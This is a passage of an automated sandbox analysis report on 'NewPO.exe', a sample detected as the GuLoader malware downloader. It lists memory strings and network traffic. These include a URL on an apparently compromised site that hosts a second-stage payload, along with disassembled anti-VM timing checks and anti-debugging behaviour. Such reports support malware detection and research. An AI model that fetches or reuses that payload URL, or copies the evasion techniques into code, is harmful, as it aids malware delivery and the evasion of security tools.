    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/members-board-of-governors/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/members-board-of-trustees/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/merit-list/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/news-and-media/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/orthopedics/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/osita/bin_ygJfz82.bin
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/osita/bin_ygJfz82.bin1
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/overview/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/privacy-policy/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/quality-standards/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/registration-and-affiliation/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/sports-day/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/thank-you/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/vision-mission/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wfme-standards/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/LayerSlider/assets/static/layerslider/css/layerslider.css
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.krea
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.tran
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.util
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/animate.css?ver=2
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/icomoon.css?ver=2
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/lae-frontend.css?
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/lae-widgets.css?v
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/premium/jquery.fa
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/premium/lae-block
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/premium/lae-front
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/premium/lae-widge
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/premium/sliders.c
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/sliders.css?ver=2
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/bdthemes-element-pack/assets/css/bdt-uikit.css?ver=3.2
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/bdthemes-element-pack/assets/css/element-pack-site.css?ve
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/bdthemes-element-pack/assets/js/bdt-uikit.min.js?ver=4.7.
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/bdthemes-element-pack/assets/js/element-pack-site.min.js?
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=2.9.3
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=2.9.3
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=2.9.7
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=2.9.7
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=2.9.7
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=2.
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.7.6
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=162
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ve
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=2.9
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementskit-lite/libs/framework/assets/js/frontend-script
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementskit-lite/modules/controls/assets/css/ekiticons.cs
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementskit-lite/modules/controls/assets/css/widgetarea-e
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementskit-lite/modules/controls/assets/js/widgetarea-ed
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/responsive.css?v
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles-pr
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.cs
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/elementor.js?ver=
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/gmaps.min.js?ver=
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/widget-scripts.js
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/jet-elements/assets/css/jet-elements-skin.css?ver=2.2.12
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/jet-elements/assets/css/jet-elements.css?ver=2.2.12
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/jet-elements/assets/js/jet-elements.min.js?ver=2.2.12
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/css/public.css?ver=2.0.0-beta
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/js/jet-menu-public-script.js?ver=2
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/js/jet-menu-widgets-scripts.js?ver
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/js/vue.min.js?ver=2.6.11
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/lib/font-awesome/css/all.min.css?v
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/lib/font-awesome/css/v4-shims.min.
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/menu-icons/css/extra.min.css?ver=0.12.4
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/templately/assets/css/editor.css?ver=1.1.2
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/plugins/wp-smush-pro/app/assets/js/smush-lazy-load.min.js?ver=3.6
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/themes/twentytwenty/assets/js/index.js?ver=1.1
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/themes/twentytwenty/print.css?ver=1.1
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/themes/twentytwenty/style.css?ver=1.1
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/uploads/2020/11/favicon-blue-bg.ico
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-content/uploads/elementor/css/global.css?ver=1601374295
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-content/uploads/useanyfont/uaf.css?ver=1601368177
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-includes/css/dashicons.min.css?ver=5.4.5
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-includes/css/dist/block-library/style.min.css?ver=5.4.5
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-includes/js/wp-embed.min.js?ver=5.4.5
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-includes/wlwmanifest.xml
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmp, NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-json/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/wp-json/elementskit/v1/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/wp-login.php
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/xmlrpc.php?rsd
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Poppins:300
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://gmpg.org/xfn/11
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://layerslider.kreaturamedia.com
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://maps.googleapis.com/maps/api/js?key&ver=5.4.5
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://schema.org
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://wordpress.org/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=AW-477806451
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-H1WG7SNJKD
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownHTTPS traffic detected: 136.243.220.59:443 -> 192.168.2.4:49765 version: TLS 1.2

    System Summary:

    barindex
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: C:\Users\user\Desktop\NewPO.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_0040162C
    Source: NewPO.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: NewPO.exe, 00000000.00000002.843658883.0000000002160000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs NewPO.exe
    Source: NewPO.exe, 00000000.00000002.842872338.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamecerebri.exe vs NewPO.exe
    Source: NewPO.exe, 00000000.00000002.844203837.0000000002A40000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamecerebri.exeFE2X vs NewPO.exe
    Source: NewPO.exe, 0000000F.00000002.1165574898.000000001DF00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs NewPO.exe
    Source: NewPO.exe, 0000000F.00000002.1165540753.000000001DC60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs NewPO.exe
    Source: NewPO.exe, 0000000F.00000000.841272047.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamecerebri.exe vs NewPO.exe
    Source: NewPO.exeBinary or memory string: OriginalFilenamecerebri.exe vs NewPO.exe
    Source: NewPO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: classification engineClassification label: mal92.rans.troj.evad.winEXE@2/0@1/1
    Source: NewPO.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\NewPO.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Users\user\Desktop\NewPO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\NewPO.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\NewPO.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: NewPO.exeVirustotal: Detection: 30%
    Source: NewPO.exeReversingLabs: Detection: 10%
    Source: unknownProcess created: C:\Users\user\Desktop\NewPO.exe 'C:\Users\user\Desktop\NewPO.exe'
    Source: C:\Users\user\Desktop\NewPO.exeProcess created: C:\Users\user\Desktop\NewPO.exe 'C:\Users\user\Desktop\NewPO.exe'

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000000.00000002.842923779.0000000000460000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_0040505D push DDF30414h; ret
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_00405019 push DDF30414h; ret
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_00406C1F push 00000076h; ret
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_00406897 push 0000007Eh; retf
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_004064AA pushad ; ret
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_004064BE pushad ; ret
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_0040754D push ecx; ret
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_00407995 pushfd ; ret
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_0040119C pushad ; iretd
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_00406212 pushad ; ret
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_00406219 pushad ; ret
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_00405EE0 pushad ; ret
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 0_2_00407FE1 push ecx; ret
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 15_2_00560036 pushad ; retf
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 15_2_00563DCF push ss; retf
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 15_2_0056458A push esi; ret
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 15_2_005600BA pushad ; retf
    Source: C:\Users\user\Desktop\NewPO.exeCode function: 15_2_005634B8 push 7359FEC5h; retf 0045h
    Source: C:\Users\user\Desktop\NewPO.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\NewPO.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\NewPO.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\NewPO.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\NewPO.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\NewPO.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\NewPO.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\NewPO.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\NewPO.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\NewPO.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    barindex
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
    Source: C:\Users\user\Desktop\NewPO.exeRDTSC instruction interceptor: First address: 0000000000466389 second address: 0000000000466389 instructions:
    Source: C:\Users\user\Desktop\NewPO.exeRDTSC instruction interceptor: First address: 00000000004653B9 second address: 00000000004653B9 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FB528B22F48h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007FB528B22F56h 0x0000001f push eax 0x00000020 jmp 00007FB528B22F75h 0x00000022 call 00007FB528B22F25h 0x00000027 pop eax 0x00000028 jmp eax 0x0000002a pop eax 0x0000002b test eax, eax 0x0000002d add edi, edx 0x0000002f dec dword ptr [ebp+000000F8h] 0x00000035 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000003c jne 00007FB528B22ED5h 0x0000003e cmp cx, bx 0x00000041 call 00007FB528B22FD6h 0x00000046 call 00007FB528B22F58h 0x0000004b lfence 0x0000004e mov edx, dword ptr [7FFE0014h] 0x00000054 lfence 0x00000057 ret 0x00000058 mov esi, edx 0x0000005a pushad 0x0000005b rdtsc
    Source: C:\Users\user\Desktop\NewPO.exeRDTSC instruction interceptor: First address: 0000000000460A1E second address: 0000000000460A1E instructions:
    Tries to detect Any.runShow sources
    Source: C:\Users\user\Desktop\NewPO.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\NewPO.exeFile opened: C:\Program Files\qga\qga.exe
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\user\Desktop\NewPO.exeRDTSC instruction interceptor: First address: 0000000000466389 second address: 0000000000466389 instructions:
    Source: C:\Users\user\Desktop\NewPO.exeRDTSC instruction interceptor: First address: 00000000004653B9 second address: 00000000004653B9 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FB528B22F48h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007FB528B22F56h 0x0000001f push eax 0x00000020 jmp 00007FB528B22F75h 0x00000022 call 00007FB528B22F25h 0x00000027 pop eax 0x00000028 jmp eax 0x0000002a pop eax 0x0000002b test eax, eax 0x0000002d add edi, edx 0x0000002f dec dword ptr [ebp+000000F8h] 0x00000035 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000003c jne 00007FB528B22ED5h 0x0000003e cmp cx, bx 0x00000041 call 00007FB528B22FD6h 0x00000046 call 00007FB528B22F58h 0x0000004b lfence 0x0000004e mov edx, dword ptr [7FFE0014h] 0x00000054 lfence 0x00000057 ret 0x00000058 mov esi, edx 0x0000005a pushad 0x0000005b rdtsc
    Source: C:\Users\user\Desktop\NewPO.exeRDTSC instruction interceptor: First address: 00000000004653ED second address: 00000000004653ED instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FB52874A5FCh 0x0000001d popad 0x0000001e call 00007FB52874A22Fh 0x00000023 lfence 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\NewPO.exeRDTSC instruction interceptor: First address: 0000000000460A1E second address: 0000000000460A1E instructions:
    Source: C:\Users\user\Desktop\NewPO.exeRDTSC instruction interceptor: First address: 00000000005653ED second address: 00000000005653ED instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FB52874A5FCh 0x0000001d popad 0x0000001e call 00007FB52874A22Fh 0x00000023 lfence 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\NewPO.exe TID: 6416Thread sleep count: 81 > 30
    Source: C:\Users\user\Desktop\NewPO.exe TID: 6416Thread sleep time: -810000s >= -30000s
    Source: C:\Users\user\Desktop\NewPO.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\NewPO.exeLast function: Thread delayed
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW=

    Anti Debugging:

    barindex
    Hides threads from debuggersShow sources
    Source: C:\Users\user\Desktop\NewPO.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\NewPO.exeProcess queried: DebugPort
    Source: NewPO.exe, 0000000F.00000002.1162559934.0000000000F30000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: NewPO.exe, 0000000F.00000002.1162559934.0000000000F30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: NewPO.exe, 0000000F.00000002.1162559934.0000000000F30000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: NewPO.exe, 0000000F.00000002.1162559934.0000000000F30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\NewPO.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\NewPO.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\NewPO.exeQueries volume information: C:\ VolumeInformation

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
